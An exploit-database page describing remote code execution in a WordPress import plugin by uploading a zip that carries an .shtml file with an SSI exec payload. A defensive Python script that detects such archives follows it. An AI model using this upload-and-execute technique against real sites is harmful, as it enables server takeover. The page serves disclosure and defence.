## https://sploitus.com/exploit?id=WPEX-ID:7F947305-7A72-4C59-9AE8-193F437FD04E
1. Configure the Apache server with mod_include and mod_cgi enabled, and enable server-side includes:
   ```
   Options Includes
   AddType text/html .shtml
   AddOutputFilter INCLUDES .shtml
   ```
2. Create a zip file including a CSV file and a file `shell.shtml` with the following contents:
   ```
   <!--#exec cmd="id" -->
   ```
3. As a site administrator on a multisite instance, visit `/wp-admin/admin.php?page=pmxi-admin-import`.
4. Click "Upload a file" and choose the zip file created previously.
5. View the response of the AJAX request to `/wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=...` to find the directory of the uploaded zip file.
6. Directly access `shell.shtml` (e.g. at `https://example.com/wp-content/uploads/wpallimport/uploads/abc123/zipfilename/shell.shtml`) to trigger the RCE.
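
A defender-side check for the archive described in step 2, as an added example that is not from this page or from the plugin: it lists the zip members an import upload handler should refuse before anything is extracted into a web-served directory. The extension allowlist, the function names and the sample file names are assumptions, and the sample archive is constructed.

```python
import io
import posixpath
import re
import zipfile

# Assumption: an import archive only needs to carry these data file types.
ALLOWED_EXTENSIONS = {".csv", ".xml", ".json", ".txt"}
# Apache SSI directives, e.g. <!--#exec cmd="..." --> or <!--#include ... -->
SSI_DIRECTIVE = re.compile(rb"<!--#\s*(exec|include)\b", re.IGNORECASE)
MAX_SCAN_BYTES = 1 << 20  # scan at most 1 MiB of each member


def audit_import_zip(zip_bytes):
    """Return (member, reason) pairs for entries that should block extraction."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            ext = posixpath.splitext(info.filename)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                findings.append((info.filename, "extension not allowed: %r" % ext))
            # Content scan also catches a directive placed in an allowed file type.
            with archive.open(info) as member:
                if SSI_DIRECTIVE.search(member.read(MAX_SCAN_BYTES)):
                    findings.append((info.filename, "contains SSI directive"))
    return findings


def build_zip(members):
    """Build an in-memory zip from a {name: text} dict (for constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, text in members.items():
            archive.writestr(name, text)
    return buf.getvalue()


# Constructed sample mirroring step 2: one CSV plus shell.shtml.
SAMPLE = build_zip({
    "products.csv": "sku,name\n1,widget\n",
    "shell.shtml": '<!--#exec cmd="id" -->',
})

if __name__ == "__main__":
    for name, reason in audit_import_zip(SAMPLE):
        print("REJECT %s: %s" % (name, reason))
```

The same function can be run over archives already sitting under the upload directory to find files left behind by earlier imports.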